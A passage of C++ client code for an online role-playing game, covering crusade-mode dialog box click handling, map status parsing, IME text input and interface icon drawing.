				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_SELECTCRUSADEDUTY, NULL, 3, NULL, NULL, NULL);
					DisableDialogBox(33);
					PlaySound('E', 14, 5);
				}
			}else
			{	if ((msX > sX + 24) && (msX < sX + 246) && (msY > sY + 150) && (msY < sY + 165))
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_SELECTCRUSADEDUTY, NULL, 1, NULL, NULL, NULL);
					DisableDialogBox(33);
					PlaySound('E', 14, 5);
				}
				if (m_iGuildRank != -1)
				{	if ((msX > sX + 24) && (msX < sX + 246) && (msY > sY + 175) && (msY < sY + 190))
					{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_SELECTCRUSADEDUTY, NULL, 2, NULL, NULL, NULL);
						DisableDialogBox(33);
						PlaySound('E', 14, 5);
		} 	}	}	}

		if ((msX > sX + 210) && (msX < sX + 260) && (msY >= sY + 296) && (msY <= sY + 316))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 813, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 2:
		if ((msX > sX + 24) && (msX < sX + 246) && (msY > sY + 160) && (msY < sY + 175))
		{	switch (m_iCrusadeDuty) {
			case 1: EnableDialogBox(18, 803, NULL, NULL); break;
			case 2: EnableDialogBox(18, 805, NULL, NULL); break;
			case 3: EnableDialogBox(18, 808, NULL, NULL); break;
		}	}

		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			DisableDialogBox(33);
			PlaySound('E', 14, 5);
		}
		break;
	}
}

void CGame::_RequestMapStatus(char * pMapName, int iMode)
{
	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_MAPSTATUS, NULL, iMode, NULL, NULL, pMapName);
}

void CGame::AddMapStatusInfo(char * pData, BOOL bIsLastData)
{
 char * cp, cTotal;
 short * sp, sIndex;
 int i;

	ZeroMemory(m_cStatusMapName, sizeof(m_cStatusMapName));

	cp = (char *)(pData + 6);
	memcpy(m_cStatusMapName, cp, 10);
	cp += 10;

	sp = (short *)cp;
	sIndex = *sp;
	cp += 2;

	cTotal = *cp;
	cp++;

	for (i = 1; i <= cTotal; i++) {
		m_stCrusadeStructureInfo[sIndex].cType = *cp;
		cp++;
		sp = (short *)cp;
		m_stCrusadeStructureInfo[sIndex].sX = *sp;
		cp += 2;
		sp = (short *)cp;
		m_stCrusadeStructureInfo[sIndex].sY = *sp;
		cp += 2;
		m_stCrusadeStructureInfo[sIndex].cSide = *cp;
		cp++;

		sIndex++;
	}

	if (bIsLastData == TRUE) {
		while (sIndex < DEF_MAXCRUSADESTRUCTURES) {
			m_stCrusadeStructureInfo[sIndex].cType = NULL;
			m_stCrusadeStructureInfo[sIndex].sX = NULL;
			m_stCrusadeStructureInfo[sIndex].sY = NULL;
			m_stCrusadeStructureInfo[sIndex].cSide = NULL;
			sIndex++;
		}
	}
}

bool CGame::GetText(HWND hWnd,UINT msg,WPARAM wparam, LPARAM lparam)
{ 	int len;
	HIMC hIMC=NULL;
	if (m_pInputBuffer == NULL) return FALSE;
	switch (msg) {
		case WM_IME_COMPOSITION:
			ZeroMemory(m_cEdit, sizeof(m_cEdit));
			if (lparam & GCS_RESULTSTR)
			{	hIMC = ImmGetContext(hWnd);
				len = ImmGetCompositionString(hIMC, GCS_RESULTSTR, NULL, 0);
				if( len > 4 ) len = 4;
				ImmGetCompositionString(hIMC, GCS_RESULTSTR, m_cEdit, len);
				ImmReleaseContext(hWnd, hIMC);
				len = strlen(m_pInputBuffer) + strlen(m_cEdit);
				if (len < m_cInputMaxLen) strcpy(m_pInputBuffer+strlen(m_pInputBuffer),m_cEdit);
				ZeroMemory(m_cEdit, sizeof(m_cEdit));
			}else if (lparam & GCS_COMPSTR)
			{	hIMC = ImmGetContext(hWnd);
				len = ImmGetCompositionString(hIMC, GCS_COMPSTR, NULL, 0);
				if( len > 4 ) len = 4;
				ImmGetCompositionString(hIMC, GCS_COMPSTR, m_cEdit, len);
				ImmReleaseContext(hWnd, hIMC);
				len = strlen(m_pInputBuffer) + strlen(m_cEdit);
				if (len >= m_cInputMaxLen) ZeroMemory(m_cEdit, sizeof(m_cEdit));
			}
			return TRUE;

		case WM_CHAR:
			if(wparam == 8)
			{	if(strlen(m_pInputBuffer) > 0)
				{	len = strlen(m_pInputBuffer);
					switch (GetCharKind(m_pInputBuffer, len-1)) {
					case 1:
						m_pInputBuffer[len-1] = NULL;
						break;
					case 2:
					case 3:
						m_pInputBuffer[len-2]  = NULL;
						m_pInputBuffer[len-1]  = NULL;
						break;
					}
					ZeroMemory(m_cEdit, sizeof(m_cEdit));
				}
			}else if ((wparam != 9) && (wparam != 13) && (wparam != 27))
			{	len = strlen(m_pInputBuffer);
				if (len >= m_cInputMaxLen-1) return FALSE;
				m_pInputBuffer[len] = wparam & 0xff;
				m_pInputBuffer[len+1] = 0;
			}
			return TRUE;
	}
	return FALSE;
}

int CGame::GetCharKind(char *str, int index)
{	int kind=1;
    do
	{	if(kind==2) kind=3;
		else
		{	if((unsigned char) *str < 128) kind=1;
	    	else kind=2;
		}
		str++;
		index--;
    }
	while(index>=0);
    return kind;
}

void CGame::ShowReceivedString(BOOL bIsHide)
{
	ZeroMemory(G_cTxt, sizeof(G_cTxt));

	strcpy(G_cTxt, m_pInputBuffer);
	if( (m_cEdit[0] != 0) && ( strlen(m_pInputBuffer)+strlen(m_cEdit)+1 <= m_cInputMaxLen ) )
	{	strcpy(G_cTxt + strlen(m_pInputBuffer), m_cEdit);
	}

	if (bIsHide == TRUE)
	{	for (unsigned char i = 0; i < strlen(G_cTxt); i++)
		if (G_cTxt[i] != NULL) G_cTxt[i] = '*';
	}

	if( (G_dwGlobalTime%400) < 210 ) G_cTxt[strlen(G_cTxt)] = '_';

	PutString(m_iInputX+1, m_iInputY+1, G_cTxt, RGB(0,0,0));
	PutString(m_iInputX, m_iInputY+1, G_cTxt, RGB(0,0,0));
	PutString(m_iInputX+1, m_iInputY, G_cTxt, RGB(0,0,0));
	PutString(m_iInputX, m_iInputY, G_cTxt, RGB(255,255,255));
}

void CGame::ClearInputString()
{
	if (m_pInputBuffer != NULL)	ZeroMemory(m_pInputBuffer, sizeof(m_pInputBuffer));
	ZeroMemory(m_cEdit, sizeof(m_cEdit));
}

void CGame::StartInputString(int sX, int sY, unsigned char iLen, char * pBuffer, BOOL bIsHide)
{
	m_bInputStatus = TRUE;
	m_iInputX = sX;
	m_iInputY = sY;
	m_pInputBuffer = pBuffer;
	ZeroMemory(m_cEdit, sizeof(m_cEdit));
	m_cInputMaxLen = iLen;
}

void CGame::EndInputString()
{	m_bInputStatus = FALSE;
	int len = strlen(m_cEdit);
	if (len > 0)
	{	m_cEdit[len] = 0;
		strcpy(m_pInputBuffer+strlen(m_pInputBuffer),m_cEdit);
		ZeroMemory( m_cEdit, sizeof(m_cEdit) );
	}
}

void CGame::ReceiveString(char *pString)
{
	strcpy(pString, m_pInputBuffer);
}

void CGame::DrawNewDialogBox(char cType, int sX, int sY, int iFrame, BOOL bIsNoColorKey, BOOL bIsTrans)
{
 DWORD dwTime = G_dwGlobalTime;

	if (m_pSprite[cType] == NULL) return;
	if (bIsNoColorKey == FALSE)
	{	if (bIsTrans == TRUE)
			 m_pSprite[cType]->PutTransSprite2(sX, sY, iFrame, dwTime);
		else m_pSprite[cType]->PutSpriteFast(sX, sY, iFrame, dwTime);
	}
	else m_pSprite[cType]->PutSpriteFastNoColorKey(sX, sY, iFrame, dwTime);
}

void CGame::DlgBoxClick_Commander(int msX, int msY) // Snoopy: Fixed for 351
{short sX, sY, tX, tY;
 double d1, d2, d3;
	if (m_bIsCrusadeMode == FALSE) return;
	sX = m_stDialogBoxInfo[36].sX;
	sY = m_stDialogBoxInfo[36].sY;

	switch (m_stDialogBoxInfo[36].cMode) {
	case 0: // Main
		if ((msX >= sX +20) && (msX <= sX +20 +46) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[36].cMode = 1;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +50) && (msX <= sX +20 +46 +50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	if (m_iTeleportLocX == -1)
			{	SetTopMsg(m_pGameMsgList[15]->m_pMsg, 5);
			}else if (strcmp(m_cMapName, m_cTeleportMapName) == 0)
			{	SetTopMsg(m_pGameMsgList[16]->m_pMsg, 5);
			}else
			{	m_stDialogBoxInfo[36].cMode = 2;
				PlaySound('E', 14, 5);
		}	}
		if ((msX >= sX +20 +100) && (msX <= sX +20 +46 +100) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[36].cMode = 3;
			m_stDialogBoxInfo[36].sV1   = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150) && (msX <= sX +20 +46 +150) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[36].cMode = 4;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 808, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 1: // Set TP
		if ((msX >= sX + 15) && (msX <= sX + 15 + 278) && (msY >= sY + 60) && (msY <= sY + 60 + 272))
		{	d1 = (double)(msX - (sX + 15));
			d2 = (double)(524.0f); 
			d3 = (d2*d1)/279.0f;
			tX = (int)d3;
			d1 = (double)(msY - (sY + 60));
			d2 = (double)(524.0f); 
			d3 = (d2*d1)/(280.0f); 
			tY = (int)d3;
			if (tX < 30) tX = 30;
			if (tY < 30) tY = 30;
			if (tX > 494) tX = 494;
			if (tY > 494) tY = 494;
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SETGUILDTELEPORTLOC, NULL, tX, tY, NULL, "middleland");
			m_stDialogBoxInfo[36].cMode = 0;
			PlaySound('E', 14, 5);
			_RequestMapStatus("middleland", 1);
		}
		if ((msX >= sX +20 +150 + 74 -50) && (msX <= sX +20 +46 +150 + 74 -50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[36].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 809, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 2: // Use TP
		if ((msX >= sX +20 +50) && (msX <= sX +20 +46 +50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_GUILDTELEPORT, NULL, NULL, NULL, NULL, NULL);
			DisableDialogBox(36);
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74 -50) && (msX <= sX +20 +46 +150 + 74 -50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[36].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 810, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 3: // Summon Unit
		if( m_bAresden == TRUE )
		{	if ((msX >= sX +20) && (msX <= sX +20 +46) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 3000)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 47, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
			}	}
			if ((msX >= sX +20 +50) && (msX <= sX +20 +50 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 2000)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 46, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
			}	}
			if ((msX >= sX +20 +100) && (msX <= sX +20 +100 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 1000)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 43, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
			}	}
			if ((msX >= sX +20 +150) && (msX <= sX +20 +150 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 1500)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 51, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
			}	}
		}else if (m_bAresden == FALSE)
		{	if ((msX >= sX +20) && (msX <= sX +20 +46) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 3000)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 45, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
			} 	}
			if ((msX >= sX +20 +50) && (msX <= sX +20 +50 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 2000)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 44, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
			} 	}
			if ((msX >= sX +20 +100) && (msX <= sX +20 +100 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 1000)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 43, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
			}	}
			if ((msX >= sX +20 +150) && (msX <= sX +20 +150 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
			{	if (m_iConstructionPoint >= 1500)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 51, 1, m_stDialogBoxInfo[36].sV1, NULL);
					PlaySound('E', 14, 5);
					DisableDialogBox(36);
		}	}	}
		if ((msX >= sX +20) && (msX <= sX +380) && (msY > sY +140) && (msY < sY +160))
		{	m_stDialogBoxInfo[36].sV1   = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20) && (msX <= sX +380) && (msY > sY +160) && (msY < sY +175))
		{	m_stDialogBoxInfo[36].sV1   = 1;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74 -50) && (msX <= sX +20 +46 +150 + 74 -50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[36].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 811, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 4: // Set constr
		if (   (msX >= sX + 15) && (msX <= sX + 15 + 278)
			&& (msY >= sY + 60) && (msY <= sY + 60 + 272))
		{	d1 = (double)(msX - (sX + 15));
			d2 = (double)(524.0f);
			d3 = (d2*d1)/279.0f;
			tX = (int)d3;
			d1 = (double)(msY - (sY + 60));
			d2 = (double)(524.0f);
			d3 = (d2*d1)/(280.0f);
			tY = (int)d3;
			if (tX < 30) tX = 30;
			if (tY < 30) tY = 30;
			if (tX > 494) tX = 494;
			if (tY > 494) tY = 494;
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SETGUILDCONSTRUCTLOC, NULL, tX, tY, NULL, "middleland");
			m_stDialogBoxInfo[36].cMode = 0;
			PlaySound('E', 14, 5);
			_RequestMapStatus("middleland", 1);
		}
		if ((msX >= sX +20 +150 + 74 -50) && (msX <= sX +20 +46 +150 + 74 -50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[36].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 812, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;
	}
}


void CGame::DlgBoxClick_Constructor(int msX, int msY)  // Snoopy: Fixed for 351
{ short sX, sY;
	if (m_bIsCrusadeMode == FALSE) return;
	sX = m_stDialogBoxInfo[37].sX;
	sY = m_stDialogBoxInfo[37].sY;

	switch (m_stDialogBoxInfo[37].cMode) {
	case 0: // Main
		if ((msX >= sX +20) && (msX <= sX +20 +46) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	if (m_iConstructLocX == -1)
			{	SetTopMsg(m_pGameMsgList[14]->m_pMsg, 5);
			}else
			{	m_stDialogBoxInfo[37].cMode = 1;
				PlaySound('E', 14, 5);
		}	}
		if ((msX >= sX +20 +50) && (msX <= sX +20 +46 +50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	if (m_iTeleportLocX == -1)
			{	SetTopMsg(m_pGameMsgList[15]->m_pMsg, 5);
			}else if (strcmp(m_cMapName, m_cTeleportMapName) == 0)
			{	SetTopMsg(m_pGameMsgList[16]->m_pMsg, 5);
			}else
			{	m_stDialogBoxInfo[37].cMode = 2;
				PlaySound('E', 14, 5);
		}	}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 805, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 1: // Choose building
		if ((msX >= sX +20) && (msX <= sX +20 +46) && (msY >= sY +220) && (msY <= sY +220 +50))
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 38, 1, m_stDialogBoxInfo[36].sV1, NULL);
			PlaySound('E', 14, 5);
			DisableDialogBox(37);
		}
		if ((msX >= sX +20 +50) && (msX <= sX +20 +50 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 39, 1, m_stDialogBoxInfo[36].sV1, NULL);
			PlaySound('E', 14, 5);
			DisableDialogBox(37);
		}
		if ((msX >= sX +20 +100) && (msX <= sX +20 +100 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 36, 1, m_stDialogBoxInfo[36].sV1, NULL);
			PlaySound('E', 14, 5);
			DisableDialogBox(37);
		}
		if ((msX >= sX +20 +150) && (msX <= sX +20 +150 +45) && (msY >= sY +220) && (msY <= sY +220 +50))
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SUMMONWARUNIT, NULL, 37, 1, m_stDialogBoxInfo[36].sV1, NULL);
			PlaySound('E', 14, 5);
			DisableDialogBox(37);
		}

		if ((msX >= sX +20 +150 + 74 -50) && (msX <= sX +20 +46 +150 + 74 -50) && (msY >= sY + 322) && (msY <= sY + 322 + 52))
		{	m_stDialogBoxInfo[37].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 322) && (msY <= sY + 322 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 806, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 2: // Use TP
		if ((msX >= sX +20 +50) && (msX <= sX +20 +46 +50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_GUILDTELEPORT, NULL, NULL, NULL, NULL, NULL);
			DisableDialogBox(37);
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74 -50) && (msX <= sX +20 +46 +150 + 74 -50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[37].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 807, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;
	}
}


void CGame::DlgBoxClick_Soldier(int msX, int msY) // Snoopy: Fixed for 351
{ short sX, sY;
	if (m_bIsCrusadeMode == FALSE) return;
	sX = m_stDialogBoxInfo[38].sX;
	sY = m_stDialogBoxInfo[38].sY;

	switch (m_stDialogBoxInfo[38].cMode) {
	case 0: // Main dlg
		if ((msX >= sX +20) && (msX <= sX +20 +46) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	if (m_iTeleportLocX == -1)
			{	SetTopMsg(m_pGameMsgList[15]->m_pMsg, 5);
			}else if (strcmp(m_cMapName, m_cTeleportMapName) == 0)
			{	SetTopMsg(m_pGameMsgList[16]->m_pMsg, 5);
			}else
			{	m_stDialogBoxInfo[38].cMode = 1;
				PlaySound('E', 14, 5);
		}	}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 803, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;

	case 1: // Use TP
		if ((msX >= sX +20) && (msX <= sX +20 +46+50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_GUILDTELEPORT, NULL, NULL, NULL, NULL, NULL);
			DisableDialogBox(38);
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74 -50) && (msX <= sX +20 +46 +150 + 74 -50) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	m_stDialogBoxInfo[38].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX +20 +150 + 74) && (msX <= sX +20 +46 +150 + 74) && (msY >= sY + 340) && (msY <= sY + 340 + 52))
		{	DisableDialogBox(18);
			EnableDialogBox(18, 804, NULL, NULL);
			PlaySound('E', 14, 5);
		}
		break;
	}
}

void CGame::SetCameraShakingEffect(short sDist, int iMul)
{
 int iDegree;

	iDegree = 5 - sDist;
	if (iDegree <= 0) iDegree = 0;
	iDegree *= 2;

	if (iMul != 0) iDegree *= iMul;

	if (iDegree <= 2) return;

	m_iCameraShakingDegree = iDegree;
}

void CGame::MeteorStrikeComing(int iCode)
{
	switch (iCode) {
	case 1: //
		SetTopMsg(m_pGameMsgList[0]->m_pMsg, 5);
		break;
	case 2: //
		SetTopMsg(m_pGameMsgList[10]->m_pMsg, 10);
		break;
	case 3: //
		SetTopMsg(m_pGameMsgList[91]->m_pMsg, 5);
		break;
	case 4: //
		SetTopMsg(m_pGameMsgList[11]->m_pMsg, 10);
		break;
	}
}

void CGame::DrawObjectFOE(int ix, int iy, int iFrame)
{	if( _iGetFOE(_tmp_iStatus) < 0 ) // red crusade circle
	{	if (iFrame <= 4 ) m_pEffectSpr[38]->PutTransSprite(ix, iy, iFrame, G_dwGlobalTime);
	}
}

void CGame::SetTopMsg(char *pString, unsigned char iLastSec)
{
	ZeroMemory(m_cTopMsg, sizeof(m_cTopMsg));
	strcpy(m_cTopMsg, pString);

	m_iTopMsgLastSec = iLastSec;
	m_dwTopMsgTime   = G_dwGlobalTime;
}

void CGame::DrawTopMsg()
{
	if (strlen(m_cTopMsg) == 0) return;
#ifdef RES_HIGH
	m_DDraw.DrawShadowBox(0, 0, 800, 30);

	if ((((G_dwGlobalTime - m_dwTopMsgTime)/250) % 2) == 0)
		PutAlignedString(0, 800, 10, m_cTopMsg, 255,255,255);
#else
	m_DDraw.DrawShadowBox(0, 0, 639, 30);

	if ((((G_dwGlobalTime - m_dwTopMsgTime)/250) % 2) == 0)
		PutAlignedString(0, 639, 10, m_cTopMsg, 255,255,255);
#endif
	if ( G_dwGlobalTime > (m_iTopMsgLastSec*1000+m_dwTopMsgTime) ) {
		ZeroMemory(m_cTopMsg, sizeof(m_cTopMsg));
	}
}


void CGame::DrawDialogBox_IconPannel(short msX, short msY)
{
short sX, sY;
DWORD dwTime = m_dwCurTime;
int next;
int resy, resx;

#ifdef RES_HIGH
resy = 120;
resx = 80;
#else
resi = 0;
#endif
    sX = m_stDialogBoxInfo[30].sX;
    sY = m_stDialogBoxInfo[30].sY;

    m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL2]->PutSpriteFast(sX-80, sY, 0, dwTime); // Icon Pannel Background

	if (m_iHP > 0) {
		if ((m_iLU_Point > 0) && (m_bIsDialogEnabled[12] == FALSE)) // Level-Up button
			PutString_SprFont2(720 + 5, 525 + 25 + 10 + 2, "Level Up!", (timeGetTime() / 3) % 255, (timeGetTime() / 3) % 255, 0);
	}
	else
	{
		if (m_cRestartCount == -1)
			PutString_SprFont2(720 + 5, 525 + 25 + 10 + 2, "Restart", (timeGetTime() / 3) % 255, (timeGetTime() / 3) % 255, 0);
	}
	// MORLA - iconos de Ataque y Crusade
	if (m_bIsSafeAttackMode) m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(506 + resx, 433+ resy, 4, dwTime); // Safe Attack Icon
    else if (m_bIsCombatMode) m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(506 + resx, 433+ resy, 5, dwTime); // Combat Mode Icon
    if ((506 + resx < msX)    && (548 + resx > msX) && (433+ resy < msY) && (475+ resy > msY))  { // Combat Mode Icon
        m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(506 + resx, 433 + resy, 16, dwTime);
        if(m_bIsCombatMode) {
            if (m_bIsSafeAttackMode) wsprintf(G_cTxt, "Safe Attack");
            else wsprintf(G_cTxt, "Attack");
        }
        else wsprintf(G_cTxt, "Peace");
        PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
    } 

    if ((m_bIsCrusadeMode) && (m_iCrusadeDuty != 0)) { // Crusade Icon
		if (m_bAresden == TRUE) {
            if ((469 + resx <= msX) && (505 + resx >= msX) && (434+ resy < msY) && (475+ resy > msY))
                 m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(468 + resx, 433+ resy, 1, dwTime);
            else m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(468 + resx, 433+ resy, 2, dwTime);
        }
        else {
            if ((469 + resx <= msX) && (505 + resx >= msX) && (434 + resy < msY) && (475 + resy > msY))
                 m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(468 + resx, 433 + resy, 0, dwTime);
            else m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(468 + resx, 433 + resy, 15, dwTime);
        }
    }
	wsprintf(G_cTxt, "%s", m_cMapMessage); 
	PutAlignedString(103+25 + resx, 245+25 + resx, 446 + resy, G_cTxt, 200,200,120);
	wsprintf(G_cTxt, "(%d, %d)", m_sPlayerX, m_sPlayerY); 
	PutAlignedString(68+25 + resx, 289+25 + resx, 457 + resy, G_cTxt, 200,200,120); // Map Message (Center Pannel)

    if ((msY > 432+ resy) && (msY < 455 + resy)) // MORLA - Menu Icons Arriva
    {    
        if ((msX > 550 + resx) && (msX < 571 + resx)) { // Inventory
            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(550 + resx, 433 + resy, 6, dwTime);
            wsprintf(G_cTxt, "Inventory");
            PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
        }
		if ((msX > 571 + resx) && (msX < 593 + resx)) { // Magic
            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(572 + resx, 433 + resy, 7, dwTime);
            wsprintf(G_cTxt, "Spell Book");
            PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
        }
        if ((msX > 595 + resx) && (msX < 615 + resx)) { // Character    
            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(595 + resx, 433 + resy, 8, dwTime);
            wsprintf(G_cTxt, "Character Menu");
            PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
        }
        if ((msX > 616 + resx) && (msX < 638 + resx)) { // Skill
            m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL]->PutSpriteFast(617 + resx, 433 + resy, 9, dwTime);
            wsprintf(G_cTxt, "Skill List");
            PutString(msX-10, msY-20, G_cTxt, RGB(250,250,220));
        }
	}

    if (msY > 455 + resy)  // MORLA - Menu Icons Abajo
    {    
        if ((msX > 550 + resx) && (msX < 571 + resx)) { // Player Panel    
